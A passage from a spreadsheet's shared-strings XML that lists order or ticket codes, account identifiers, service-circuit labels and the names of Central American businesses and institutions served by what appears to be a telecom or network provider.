  </si>
  <si>
    <t>F4585929</t>
  </si>
  <si>
    <t>F4585932</t>
  </si>
  <si>
    <t>F4585936</t>
  </si>
  <si>
    <t>332100004T</t>
  </si>
  <si>
    <t>F4585938</t>
  </si>
  <si>
    <t>F4585944</t>
  </si>
  <si>
    <t>F4585946</t>
  </si>
  <si>
    <t>F4585947</t>
  </si>
  <si>
    <t>F4585950</t>
  </si>
  <si>
    <t>F4585955</t>
  </si>
  <si>
    <t>F4585957</t>
  </si>
  <si>
    <t>417000002T</t>
  </si>
  <si>
    <t>DROGUERIA WASHINGTON</t>
  </si>
  <si>
    <t>1045405OH</t>
  </si>
  <si>
    <t>F4585965</t>
  </si>
  <si>
    <t>F4585975</t>
  </si>
  <si>
    <t>F4585977</t>
  </si>
  <si>
    <t>F4585978</t>
  </si>
  <si>
    <t>F4613441</t>
  </si>
  <si>
    <t>888318OH</t>
  </si>
  <si>
    <t>F4613467</t>
  </si>
  <si>
    <t>IP2170004SV</t>
  </si>
  <si>
    <t>F4613537</t>
  </si>
  <si>
    <t>22059400SV</t>
  </si>
  <si>
    <t>PROYECT DE EL SALVADOR SA DE CV</t>
  </si>
  <si>
    <t>F4613542</t>
  </si>
  <si>
    <t>449660ON</t>
  </si>
  <si>
    <t>F4613546</t>
  </si>
  <si>
    <t>61200206T</t>
  </si>
  <si>
    <t>F4613567</t>
  </si>
  <si>
    <t>F4613581</t>
  </si>
  <si>
    <t>F4613582</t>
  </si>
  <si>
    <t>F4613587</t>
  </si>
  <si>
    <t>247900005T</t>
  </si>
  <si>
    <t>F4613589</t>
  </si>
  <si>
    <t>F4618970</t>
  </si>
  <si>
    <t>F4618971</t>
  </si>
  <si>
    <t>F4618972</t>
  </si>
  <si>
    <t>F4618976</t>
  </si>
  <si>
    <t>22121000SV</t>
  </si>
  <si>
    <t>F4618980</t>
  </si>
  <si>
    <t>F4618989</t>
  </si>
  <si>
    <t>F4618990</t>
  </si>
  <si>
    <t>F4618998</t>
  </si>
  <si>
    <t>F4619018</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0115</t>
  </si>
  <si>
    <t>F4619022</t>
  </si>
  <si>
    <t>F4619024</t>
  </si>
  <si>
    <t>F4619025</t>
  </si>
  <si>
    <t>F4619031</t>
  </si>
  <si>
    <t>IP2038452SV</t>
  </si>
  <si>
    <t>F4619042</t>
  </si>
  <si>
    <t>854500OH</t>
  </si>
  <si>
    <t>OH1000722826/SERVITEL Y NETWORK -</t>
  </si>
  <si>
    <t>F4619051</t>
  </si>
  <si>
    <t>F4619064</t>
  </si>
  <si>
    <t>90001910454T</t>
  </si>
  <si>
    <t>F4619072</t>
  </si>
  <si>
    <t>515700001T</t>
  </si>
  <si>
    <t>AGRO INDUSTRIAS NACIONALES S.A.</t>
  </si>
  <si>
    <t>F4619075</t>
  </si>
  <si>
    <t>450824ON</t>
  </si>
  <si>
    <t>F4619095</t>
  </si>
  <si>
    <t>782500001T</t>
  </si>
  <si>
    <t>REENCAUCHES NEUMATICOS Y COMBUSTIBLES</t>
  </si>
  <si>
    <t>F4619100</t>
  </si>
  <si>
    <t>F4621121</t>
  </si>
  <si>
    <t>CC_WALMART_SV_FORTIFRUTI</t>
  </si>
  <si>
    <t>F4557920</t>
  </si>
  <si>
    <t>F4557969</t>
  </si>
  <si>
    <t>F4558014</t>
  </si>
  <si>
    <t>F4558027</t>
  </si>
  <si>
    <t>745500002T</t>
  </si>
  <si>
    <t>LAW &amp; COMMERCE S.A.</t>
  </si>
  <si>
    <t>F4558055</t>
  </si>
  <si>
    <t>F4558059</t>
  </si>
  <si>
    <t>F4558064</t>
  </si>
  <si>
    <t>F4558067</t>
  </si>
  <si>
    <t>F4558069</t>
  </si>
  <si>
    <t>446100010T</t>
  </si>
  <si>
    <t>F4591440</t>
  </si>
  <si>
    <t>F4591441</t>
  </si>
  <si>
    <t>5639966ON</t>
  </si>
  <si>
    <t>PMA</t>
  </si>
  <si>
    <t>5059319ON</t>
  </si>
  <si>
    <t>450866ON</t>
  </si>
  <si>
    <t>F4591450</t>
  </si>
  <si>
    <t>902400002T</t>
  </si>
  <si>
    <t>910400133T</t>
  </si>
  <si>
    <t>F4591454</t>
  </si>
  <si>
    <t>F4591457</t>
  </si>
  <si>
    <t>F4591460</t>
  </si>
  <si>
    <t>F4591461</t>
  </si>
  <si>
    <t>F4591463</t>
  </si>
  <si>
    <t>28914000SV</t>
  </si>
  <si>
    <t>HOSPITAL NACIONAL FRANCISCO MENEDEZ AHUACHAPAN</t>
  </si>
  <si>
    <t>F4591476</t>
  </si>
  <si>
    <t>F4591479</t>
  </si>
  <si>
    <t>F4591482</t>
  </si>
  <si>
    <t>31300020T</t>
  </si>
  <si>
    <t>F4591490</t>
  </si>
  <si>
    <t>F4591493</t>
  </si>
  <si>
    <t>90001902627T</t>
  </si>
  <si>
    <t>F4591496</t>
  </si>
  <si>
    <t>F4591497</t>
  </si>
  <si>
    <t>24693100SV</t>
  </si>
  <si>
    <t>CONTR0001786237OC</t>
  </si>
  <si>
    <t>F4591514</t>
  </si>
  <si>
    <t>297401014T</t>
  </si>
  <si>
    <t>90001907672T</t>
  </si>
  <si>
    <t>F4591518</t>
  </si>
  <si>
    <t>F4591519</t>
  </si>
  <si>
    <t>90001905842T</t>
  </si>
  <si>
    <t>F4591525</t>
  </si>
  <si>
    <t>F4591532</t>
  </si>
  <si>
    <t>F4591544</t>
  </si>
  <si>
    <t>24612900SV</t>
  </si>
  <si>
    <t>22067600SV</t>
  </si>
  <si>
    <t>CORPORACION JV DE CENTROAMERICA SA DE CV</t>
  </si>
  <si>
    <t>942700001T</t>
  </si>
  <si>
    <t>ALFANET, S.A.</t>
  </si>
  <si>
    <t>F4591564</t>
  </si>
  <si>
    <t>F4591569</t>
  </si>
  <si>
    <t>317300006T</t>
  </si>
  <si>
    <t>GRUPO Q GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4605137</t>
  </si>
  <si>
    <t>F4605182</t>
  </si>
  <si>
    <t>758500225T</t>
  </si>
  <si>
    <t>F4605190</t>
  </si>
  <si>
    <t>407600001T</t>
  </si>
  <si>
    <t>DE MOTORS S.A.</t>
  </si>
  <si>
    <t>F4605205</t>
  </si>
  <si>
    <t>F4605208</t>
  </si>
  <si>
    <t>245700080T</t>
  </si>
  <si>
    <t>790200005T</t>
  </si>
  <si>
    <t>SERVICIOS DE CONSULTORIA INTEGRADOS, S.A.</t>
  </si>
  <si>
    <t>F4605215</t>
  </si>
  <si>
    <t>90001907074T</t>
  </si>
  <si>
    <t>F4605225</t>
  </si>
  <si>
    <t>F4605226</t>
  </si>
  <si>
    <t>F4605227</t>
  </si>
  <si>
    <t>F4605228</t>
  </si>
  <si>
    <t>F4605242</t>
  </si>
  <si>
    <t>F4605249</t>
  </si>
  <si>
    <t>F4605250</t>
  </si>
  <si>
    <t>86100059T</t>
  </si>
  <si>
    <t>F4605264</t>
  </si>
  <si>
    <t>F4579276</t>
  </si>
  <si>
    <t>F4579282</t>
  </si>
  <si>
    <t>F4579287</t>
  </si>
  <si>
    <t>F4579289</t>
  </si>
  <si>
    <t>291600001T</t>
  </si>
  <si>
    <t>SISTEMAS ARQUITECTONICOS EUROPEOS S.A.</t>
  </si>
  <si>
    <t>F4579292</t>
  </si>
  <si>
    <t>F4579304</t>
  </si>
  <si>
    <t>90001910400T</t>
  </si>
  <si>
    <t>292900491T</t>
  </si>
  <si>
    <t>F4579327</t>
  </si>
  <si>
    <t>23800002T</t>
  </si>
  <si>
    <t>SACOS AGRICOLAS, S.A.</t>
  </si>
  <si>
    <t>F4579330</t>
  </si>
  <si>
    <t>F4579333</t>
  </si>
  <si>
    <t>F4579336</t>
  </si>
  <si>
    <t>F4579338</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_0776</t>
  </si>
  <si>
    <t>F4579348</t>
  </si>
  <si>
    <t>ID1028584SV</t>
  </si>
  <si>
    <t>CHIA HO HSING, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4579359</t>
  </si>
  <si>
    <t>609100001T</t>
  </si>
  <si>
    <t>FARMA QUIMICA, S.A.</t>
  </si>
  <si>
    <t>F4579375</t>
  </si>
  <si>
    <t>90001908759T</t>
  </si>
  <si>
    <t>F4579380</t>
  </si>
  <si>
    <t>F4579387</t>
  </si>
  <si>
    <t>IP2165169SV</t>
  </si>
  <si>
    <t>IP2187047SV</t>
  </si>
  <si>
    <t>F4579400</t>
  </si>
  <si>
    <t>90001908811T</t>
  </si>
  <si>
    <t>F4596407</t>
  </si>
  <si>
    <t>F4596439</t>
  </si>
  <si>
    <t>F4596440</t>
  </si>
  <si>
    <t>F4596500</t>
  </si>
  <si>
    <t>F4609371</t>
  </si>
  <si>
    <t>F4609372</t>
  </si>
  <si>
    <t>F4609373</t>
  </si>
  <si>
    <t>F4609386</t>
  </si>
  <si>
    <t>F4609388</t>
  </si>
  <si>
    <t>F4609389</t>
  </si>
  <si>
    <t>F4609391</t>
  </si>
  <si>
    <t>F4609393</t>
  </si>
  <si>
    <t>F4609399</t>
  </si>
  <si>
    <t>F4609410</t>
  </si>
  <si>
    <t>F4609412</t>
  </si>
  <si>
    <t>47502754T</t>
  </si>
  <si>
    <t>F4609422</t>
  </si>
  <si>
    <t>F4609423</t>
  </si>
  <si>
    <t>47500814T</t>
  </si>
  <si>
    <t>F4609432</t>
  </si>
  <si>
    <t>F4609433</t>
  </si>
  <si>
    <t>F4609434</t>
  </si>
  <si>
    <t>F4609449</t>
  </si>
  <si>
    <t>F4609453</t>
  </si>
  <si>
    <t>F4609455</t>
  </si>
  <si>
    <t>F4609457</t>
  </si>
  <si>
    <t>F4609470</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_0781</t>
  </si>
  <si>
    <t>F4609487</t>
  </si>
  <si>
    <t>F4609511</t>
  </si>
  <si>
    <t>F4586121</t>
  </si>
  <si>
    <t>F4586123</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0197</t>
  </si>
  <si>
    <t>581700008T</t>
  </si>
  <si>
    <t>780300001T</t>
  </si>
  <si>
    <t>F4586138</t>
  </si>
  <si>
    <t>90001911265T</t>
  </si>
  <si>
    <t>F4586153</t>
  </si>
  <si>
    <t>90001901288T</t>
  </si>
  <si>
    <t>23257600SV</t>
  </si>
  <si>
    <t>CROWLEY LOGISTIC S EL SALVADOR</t>
  </si>
  <si>
    <t>896800001T</t>
  </si>
  <si>
    <t>FID GUATEMALA SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>F4586193</t>
  </si>
  <si>
    <t>CONTR0001395470OC</t>
  </si>
  <si>
    <t>F4586196</t>
  </si>
  <si>
    <t>CONTR0001487442OC</t>
  </si>
  <si>
    <t>F4586203</t>
  </si>
  <si>
    <t>8900739T</t>
  </si>
  <si>
    <t>F4586206</t>
  </si>
  <si>
    <t>F4586208</t>
  </si>
  <si>
    <t>F4586215</t>
  </si>
  <si>
    <t>F4586219</t>
  </si>
  <si>
    <t>90001903830T</t>
  </si>
  <si>
    <t>F4586224</t>
  </si>
  <si>
    <t>F4586225</t>
  </si>
  <si>
    <t>F4586232</t>
  </si>
  <si>
    <t>449578ON</t>
  </si>
  <si>
    <t>90001908843T</t>
  </si>
  <si>
    <t>90001903940T</t>
  </si>
  <si>
    <t>F4586244</t>
  </si>
  <si>
    <t>807900479T</t>
  </si>
  <si>
    <t>4729480ON</t>
  </si>
  <si>
    <t>F4586251</t>
  </si>
  <si>
    <t>F4586252</t>
  </si>
  <si>
    <t>F4586256</t>
  </si>
  <si>
    <t>F4613599</t>
  </si>
  <si>
    <t>F4613600</t>
  </si>
  <si>
    <t>23143600SV</t>
  </si>
  <si>
    <t>PRODUCTOS CARNICOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4613606</t>
  </si>
  <si>
    <t>F4613607</t>
  </si>
  <si>
    <t>F4613611</t>
  </si>
  <si>
    <t>23891800SV</t>
  </si>
  <si>
    <t>ASOCIACION DESARROLLO ECONOMICO Y SOCIAL</t>
  </si>
  <si>
    <t>334400001T</t>
  </si>
  <si>
    <t>POLIMEROS Y TECNOLOGIA S.A.</t>
  </si>
  <si>
    <t>CONTR0001520638OC</t>
  </si>
  <si>
    <t>UNIVERSIDAD ULATINA SOCIEDAD RESPONSABILIDAD LIMITADA</t>
  </si>
  <si>
    <t>1585232OH</t>
  </si>
  <si>
    <t>F4613632</t>
  </si>
  <si>
    <t>247900010T</t>
  </si>
  <si>
    <t>F4613652</t>
  </si>
  <si>
    <t>F4613661</t>
  </si>
  <si>
    <t>F4613671</t>
  </si>
  <si>
    <t>F4613672</t>
  </si>
  <si>
    <t>F4613673</t>
  </si>
  <si>
    <t>F4613675</t>
  </si>
  <si>
    <t>F4613681</t>
  </si>
  <si>
    <t>265900366T</t>
  </si>
  <si>
    <t>471100002T</t>
  </si>
  <si>
    <t>SIEMPRE FIT S.A.</t>
  </si>
  <si>
    <t>IP2110001SV</t>
  </si>
  <si>
    <t>IP2124216SV</t>
  </si>
  <si>
    <t>F4613701</t>
  </si>
  <si>
    <t>F4613704</t>
  </si>
  <si>
    <t>825300031T</t>
  </si>
  <si>
    <t>F4613708</t>
  </si>
  <si>
    <t>F4613709</t>
  </si>
  <si>
    <t>F4613710</t>
  </si>
  <si>
    <t>4258129ON</t>
  </si>
  <si>
    <t>ON0002476005/TRANSACTEL NICARAGUA SOCIEDAD ANONIMATRANSACTEL NICARAGUA</t>
  </si>
  <si>
    <t>F4613712</t>
  </si>
  <si>
    <t>F4613716</t>
  </si>
  <si>
    <t>F4613723</t>
  </si>
  <si>
    <t>664700007T</t>
  </si>
  <si>
    <t>F4613730</t>
  </si>
  <si>
    <t>F4613736</t>
  </si>
  <si>
    <t>F4585020</t>
  </si>
  <si>
    <t>F4585021</t>
  </si>
  <si>
    <t>F4585022</t>
  </si>
  <si>
    <t>F4585023</t>
  </si>
  <si>
    <t>F4585041</t>
  </si>
  <si>
    <t>F4585043</t>
  </si>
  <si>
    <t>F4585048</t>
  </si>
  <si>
    <t>F4585051</t>
  </si>
  <si>
    <t>F4585066</t>
  </si>
  <si>
    <t>IP2040059SV</t>
  </si>
  <si>
    <t>F4585079</t>
  </si>
  <si>
    <t>758500006T</t>
  </si>
  <si>
    <t>90001906507T</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_911</t>
  </si>
  <si>
    <t>F4585084</t>
  </si>
  <si>
    <t>F4585093</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3169</t>
  </si>
  <si>
    <t>F4585099</t>
  </si>
  <si>
    <t>F4585118</t>
  </si>
  <si>
    <t>F4585133</t>
  </si>
  <si>
    <t>F4585138</t>
  </si>
  <si>
    <t>F4585161</t>
  </si>
  <si>
    <t>F4585166</t>
  </si>
  <si>
    <t>F4585168</t>
  </si>
  <si>
    <t>F4585173</t>
  </si>
  <si>
    <t>F4564032</t>
  </si>
  <si>
    <t>F4564041</t>
  </si>
  <si>
    <t>619500014T</t>
  </si>
  <si>
    <t>F4564064</t>
  </si>
  <si>
    <t>F4564084</t>
  </si>
  <si>
    <t>F4564088</t>
  </si>
  <si>
    <t>F4564095</t>
  </si>
  <si>
    <t>F4564098</t>
  </si>
  <si>
    <t>F4564107</t>
  </si>
  <si>
    <t>F4564112</t>
  </si>
  <si>
    <t>344400580T</t>
  </si>
  <si>
    <t>F4564174</t>
  </si>
  <si>
    <t>F4564178</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3090</t>
  </si>
  <si>
    <t>F4564192</t>
  </si>
  <si>
    <t>F4564198</t>
  </si>
  <si>
    <t>47503106T</t>
  </si>
  <si>
    <t>F4580121</t>
  </si>
  <si>
    <t>F4580158</t>
  </si>
  <si>
    <t>F4580172</t>
  </si>
  <si>
    <t>90001910366T</t>
  </si>
  <si>
    <t>F4580195</t>
  </si>
  <si>
    <t>1292923OH</t>
  </si>
  <si>
    <t>1047475OH</t>
  </si>
  <si>
    <t>1311914OH</t>
  </si>
  <si>
    <t>F4580217</t>
  </si>
  <si>
    <t>865200001T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA HALCON, S.A.</t>
  </si>
  <si>
    <t>1195143OH</t>
  </si>
  <si>
    <t>701139OH</t>
  </si>
  <si>
    <t>F4580278</t>
  </si>
  <si>
    <t>F4574601</t>
  </si>
  <si>
    <t>F4574603</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0125</t>
  </si>
  <si>
    <t>F4574609</t>
  </si>
  <si>
    <t>F4574613</t>
  </si>
  <si>
    <t>F4574614</t>
  </si>
  <si>
    <t>CONTR0001582912OC</t>
  </si>
  <si>
    <t>F4574621</t>
  </si>
  <si>
    <t>F4574624</t>
  </si>
  <si>
    <t>F4574626</t>
  </si>
  <si>
    <t>90001908652T</t>
  </si>
  <si>
    <t>F4574630</t>
  </si>
  <si>
    <t>590900001T</t>
  </si>
  <si>
    <t>CORPORATIVO IMAGEN EMPRESARIAL SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>581000009T</t>
  </si>
  <si>
    <t>F4574666</t>
  </si>
  <si>
    <t>F4574668</t>
  </si>
  <si>
    <t>26450600SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL MONCAGUA</t>
  </si>
  <si>
    <t>F4574675</t>
  </si>
  <si>
    <t>F4574685</t>
  </si>
  <si>
    <t>F4574686</t>
  </si>
  <si>
    <t>F4574698</t>
  </si>
  <si>
    <t>F4574709</t>
  </si>
  <si>
    <t>F4574713</t>
  </si>
  <si>
    <t>5800027T</t>
  </si>
  <si>
    <t>F4574726</t>
  </si>
  <si>
    <t>F4574730</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4651</t>
  </si>
  <si>
    <t>F4574744</t>
  </si>
  <si>
    <t>F4547453</t>
  </si>
  <si>
    <t>F4547490</t>
  </si>
  <si>
    <t>F4547506</t>
  </si>
  <si>
    <t>F4547512</t>
  </si>
  <si>
    <t>F4547514</t>
  </si>
  <si>
    <t>86100026T</t>
  </si>
  <si>
    <t>F4547523</t>
  </si>
  <si>
    <t>F4547559</t>
  </si>
  <si>
    <t>F4547563</t>
  </si>
  <si>
    <t>F4547564</t>
  </si>
  <si>
    <t>F4547570</t>
  </si>
  <si>
    <t>1112147OH</t>
  </si>
  <si>
    <t>IP2204057SV</t>
  </si>
  <si>
    <t>770600192T</t>
  </si>
  <si>
    <t>F4547606</t>
  </si>
  <si>
    <t>F4591725</t>
  </si>
  <si>
    <t>629700001T</t>
  </si>
  <si>
    <t>AGENCIA DE SEGUROS Y FIANZAS ROTMANN BARRIOS</t>
  </si>
  <si>
    <t>F4591735</t>
  </si>
  <si>
    <t>F4591737</t>
  </si>
  <si>
    <t>360300036T</t>
  </si>
  <si>
    <t>ID1053045SV</t>
  </si>
  <si>
    <t>1209020OH</t>
  </si>
  <si>
    <t>12700159T</t>
  </si>
  <si>
    <t>F4591759</t>
  </si>
  <si>
    <t>F4591761</t>
  </si>
  <si>
    <t>F4591762</t>
  </si>
  <si>
    <t>1209129OH</t>
  </si>
  <si>
    <t>8901901T</t>
  </si>
  <si>
    <t>913300002T</t>
  </si>
  <si>
    <t>PLAZA NEVADA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4591776</t>
  </si>
  <si>
    <t>941500002T</t>
  </si>
  <si>
    <t>GLOBAL MOBILITY APEX S.A..</t>
  </si>
  <si>
    <t>F4591778</t>
  </si>
  <si>
    <t>F4591779</t>
  </si>
  <si>
    <t>F4591784</t>
  </si>
  <si>
    <t>1011307OH</t>
  </si>
  <si>
    <t>872600017T</t>
  </si>
  <si>
    <t>F4591810</t>
  </si>
  <si>
    <t>F4591811</t>
  </si>
  <si>
    <t>225800004T</t>
  </si>
  <si>
    <t>BAVARIA MOTORS S.A.</t>
  </si>
  <si>
    <t>F4591834</t>
  </si>
  <si>
    <t>F4591839</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_TEJUTLA</t>
  </si>
  <si>
    <t>ID1126045SV</t>
  </si>
  <si>
    <t>REMASUR S.A DE C.V.</t>
  </si>
  <si>
    <t>F4591847</t>
  </si>
  <si>
    <t>F4591848</t>
  </si>
  <si>
    <t>ID1024261SV</t>
  </si>
  <si>
    <t>838366OH</t>
  </si>
  <si>
    <t>F4591852</t>
  </si>
  <si>
    <t>F4591853</t>
  </si>
  <si>
    <t>F4591855</t>
  </si>
  <si>
    <t>ID1031203SV</t>
  </si>
  <si>
    <t>MC LOGISTICA EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4591858</t>
  </si>
  <si>
    <t>F4591866</t>
  </si>
  <si>
    <t>297400355T</t>
  </si>
  <si>
    <t>F4564554</t>
  </si>
  <si>
    <t>F4564560</t>
  </si>
  <si>
    <t>F4564567</t>
  </si>
  <si>
    <t>F4564568</t>
  </si>
  <si>
    <t>F4564573</t>
  </si>
  <si>
    <t>F4564576</t>
  </si>
  <si>
    <t>F4564593</t>
  </si>
  <si>
    <t>F4564594</t>
  </si>
  <si>
    <t>F4564595</t>
  </si>
  <si>
    <t>F4564597</t>
  </si>
  <si>
    <t>F4564599</t>
  </si>
  <si>
    <t>F4564604</t>
  </si>
  <si>
    <t>F4564605</t>
  </si>
  <si>
    <t>F4564606</t>
  </si>
  <si>
    <t>ID1112066SV</t>
  </si>
  <si>
    <t>F4564623</t>
  </si>
  <si>
    <t>90001911153T</t>
  </si>
  <si>
    <t>F4564638</t>
  </si>
  <si>
    <t>F4564640</t>
  </si>
  <si>
    <t>770600118T</t>
  </si>
  <si>
    <t>90001906181T</t>
  </si>
  <si>
    <t>F4564646</t>
  </si>
  <si>
    <t>25202800SV</t>
  </si>
  <si>
    <t>ALUMICENTRO DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4564656</t>
  </si>
  <si>
    <t>F4564660</t>
  </si>
  <si>
    <t>F4564667</t>
  </si>
  <si>
    <t>F4564670</t>
  </si>
  <si>
    <t>F4564678</t>
  </si>
  <si>
    <t>406300001T</t>
  </si>
  <si>
    <t>MARIO ESTUARDO CASTRILLO GIRON</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA</t>
  </si>
  <si>
    <t>F4586825</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_0492</t>
  </si>
  <si>
    <t>F4586850</t>
  </si>
  <si>
    <t>ID1276048SV</t>
  </si>
  <si>
    <t>F4586882</t>
  </si>
  <si>
    <t>F4582350</t>
  </si>
  <si>
    <t>F4582352</t>
  </si>
  <si>
    <t>F4582360</t>
  </si>
  <si>
    <t>F4582375</t>
  </si>
  <si>
    <t>F4582409</t>
  </si>
  <si>
    <t>F4582410</t>
  </si>
  <si>
    <t>1343190OH</t>
  </si>
  <si>
    <t>F4582415</t>
  </si>
  <si>
    <t>F4582417</t>
  </si>
  <si>
    <t>F4582425</t>
  </si>
  <si>
    <t>F4582448</t>
  </si>
  <si>
    <t>F4582453</t>
  </si>
  <si>
    <t>F4582454</t>
  </si>
  <si>
    <t>F4582465</t>
  </si>
  <si>
    <t>F4582466</t>
  </si>
  <si>
    <t>F4582467</t>
  </si>
  <si>
    <t>F4582475</t>
  </si>
  <si>
    <t>F4582476</t>
  </si>
  <si>
    <t>F4582482</t>
  </si>
  <si>
    <t>F4582489</t>
  </si>
  <si>
    <t>F4582490</t>
  </si>
  <si>
    <t>F4582491</t>
  </si>
  <si>
    <t>F4582492</t>
  </si>
  <si>
    <t>F4582496</t>
  </si>
  <si>
    <t>F4582497</t>
  </si>
  <si>
    <t>IDG002042SV</t>
  </si>
  <si>
    <t xml:space="preserve">ASOC.DE LAS RELIGIOSAS DE LA CRUZ DEL SAGRADO CORAZON DE JESUS								</t>
  </si>
  <si>
    <t>746016OH</t>
  </si>
  <si>
    <t>F4548913</t>
  </si>
  <si>
    <t>F4548917</t>
  </si>
  <si>
    <t>F4548924</t>
  </si>
  <si>
    <t>17400247T</t>
  </si>
  <si>
    <t>61200126T</t>
  </si>
  <si>
    <t>F4548940</t>
  </si>
  <si>
    <t>FMN034J</t>
  </si>
  <si>
    <t>F4548947</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0136</t>
  </si>
  <si>
    <t>F4548949</t>
  </si>
  <si>
    <t>440900019T</t>
  </si>
  <si>
    <t>829800044T</t>
  </si>
  <si>
    <t>5455567ON</t>
  </si>
  <si>
    <t>1214518OH</t>
  </si>
  <si>
    <t>F4548957</t>
  </si>
  <si>
    <t>1732347OH</t>
  </si>
  <si>
    <t>OH1001080360</t>
  </si>
  <si>
    <t>F4548962</t>
  </si>
  <si>
    <t>F4548976</t>
  </si>
  <si>
    <t>F4548980</t>
  </si>
  <si>
    <t>F4548981</t>
  </si>
  <si>
    <t>F4548985</t>
  </si>
  <si>
    <t>F4548986</t>
  </si>
  <si>
    <t>916000023T</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0572</t>
  </si>
  <si>
    <t>F4548995</t>
  </si>
  <si>
    <t>22380100SV</t>
  </si>
  <si>
    <t>TRANSGLOBAL LOGISTIC S.A. DE C.V.</t>
  </si>
  <si>
    <t>8902424T</t>
  </si>
  <si>
    <t>537300001T</t>
  </si>
  <si>
    <t>GASTRO</t>
  </si>
  <si>
    <t>FH3029</t>
  </si>
  <si>
    <t>F4549014</t>
  </si>
  <si>
    <t>F4549023</t>
  </si>
  <si>
    <t>F4549024</t>
  </si>
  <si>
    <t>90001900858T</t>
  </si>
  <si>
    <t>1422693OH</t>
  </si>
  <si>
    <t>F4591873</t>
  </si>
  <si>
    <t>MP221413006SSV</t>
  </si>
  <si>
    <t>ID1205008SV</t>
  </si>
  <si>
    <t>MAURICIO ALFONSO AREVALO MATA</t>
  </si>
  <si>
    <t>849500001T</t>
  </si>
  <si>
    <t>SERVICIOS MEDICOS MIRAFLORES, S.A.</t>
  </si>
  <si>
    <t>F4591890</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_ZONA_9</t>
  </si>
  <si>
    <t>F4591894</t>
  </si>
  <si>
    <t>8901467T</t>
  </si>
  <si>
    <t>F4591909</t>
  </si>
  <si>
    <t>F4591912</t>
  </si>
  <si>
    <t>F4591914</t>
  </si>
  <si>
    <t>F4591915</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1848</t>
  </si>
  <si>
    <t>F4591919</t>
  </si>
  <si>
    <t>F4591921</t>
  </si>
  <si>
    <t>F4591930</t>
  </si>
  <si>
    <t>F4591931</t>
  </si>
  <si>
    <t>22397400SV</t>
  </si>
  <si>
    <t>F4591936</t>
  </si>
  <si>
    <t>22136400SV</t>
  </si>
  <si>
    <t>MEMORIAL INTERNATIONAL EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>IP2124177SV</t>
  </si>
  <si>
    <t>F4591952</t>
  </si>
  <si>
    <t>F4591954</t>
  </si>
  <si>
    <t>ID1124120SV</t>
  </si>
  <si>
    <t>24833800SV</t>
  </si>
  <si>
    <t>F4591962</t>
  </si>
  <si>
    <t>F4591965</t>
  </si>
  <si>
    <t>F4591966</t>
  </si>
  <si>
    <t>F4591969</t>
  </si>
  <si>
    <t>F4591970</t>
  </si>
  <si>
    <t>F4591982</t>
  </si>
  <si>
    <t>F4591986</t>
  </si>
  <si>
    <t>297400730T</t>
  </si>
  <si>
    <t>F4591988</t>
  </si>
  <si>
    <t>5641636ON</t>
  </si>
  <si>
    <t>F4591992</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_VISTA_HERMOSA_Z15</t>
  </si>
  <si>
    <t>F4591993</t>
  </si>
  <si>
    <t>F4591998</t>
  </si>
  <si>
    <t>F4591999</t>
  </si>
  <si>
    <t>21328500SV</t>
  </si>
  <si>
    <t>F4592009</t>
  </si>
  <si>
    <t>F4592010</t>
  </si>
  <si>
    <t>F4592016</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_2AV_PATULUL</t>
  </si>
  <si>
    <t>F4566927</t>
  </si>
  <si>
    <t>47503857T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C653</t>
  </si>
  <si>
    <t>F4566967</t>
  </si>
  <si>
    <t>99900370T</t>
  </si>
  <si>
    <t>F4567015</t>
  </si>
  <si>
    <t>F4567024</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C145</t>
  </si>
  <si>
    <t>F4567042</t>
  </si>
  <si>
    <t>344400027T</t>
  </si>
  <si>
    <t>F4567043</t>
  </si>
  <si>
    <t>F4567050</t>
  </si>
  <si>
    <t>426100016T</t>
  </si>
  <si>
    <t>288900008T</t>
  </si>
  <si>
    <t>F4623641</t>
  </si>
  <si>
    <t>F4623656</t>
  </si>
  <si>
    <t>47501120T</t>
  </si>
  <si>
    <t>F4623710</t>
  </si>
  <si>
    <t>F4623727</t>
  </si>
  <si>
    <t>F4551136</t>
  </si>
  <si>
    <t>F4551140</t>
  </si>
  <si>
    <t>F4551182</t>
  </si>
  <si>
    <t>F4551194</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_INTERNET_DATA_CENTER_Z9_BACKUP</t>
  </si>
  <si>
    <t>F4551295</t>
  </si>
  <si>
    <t>F4551299</t>
  </si>
  <si>
    <t>90001906333T</t>
  </si>
  <si>
    <t>F4614218</t>
  </si>
  <si>
    <t>90001909270T</t>
  </si>
  <si>
    <t>ID1067032SV</t>
  </si>
  <si>
    <t>DICOMAYA S.A. DE C.V.</t>
  </si>
  <si>
    <t>888000001T</t>
  </si>
  <si>
    <t>COOPERATIVA INTEGRAL DE AHORRO Y CRÉDITO "UNIVERSAL" R.L</t>
  </si>
  <si>
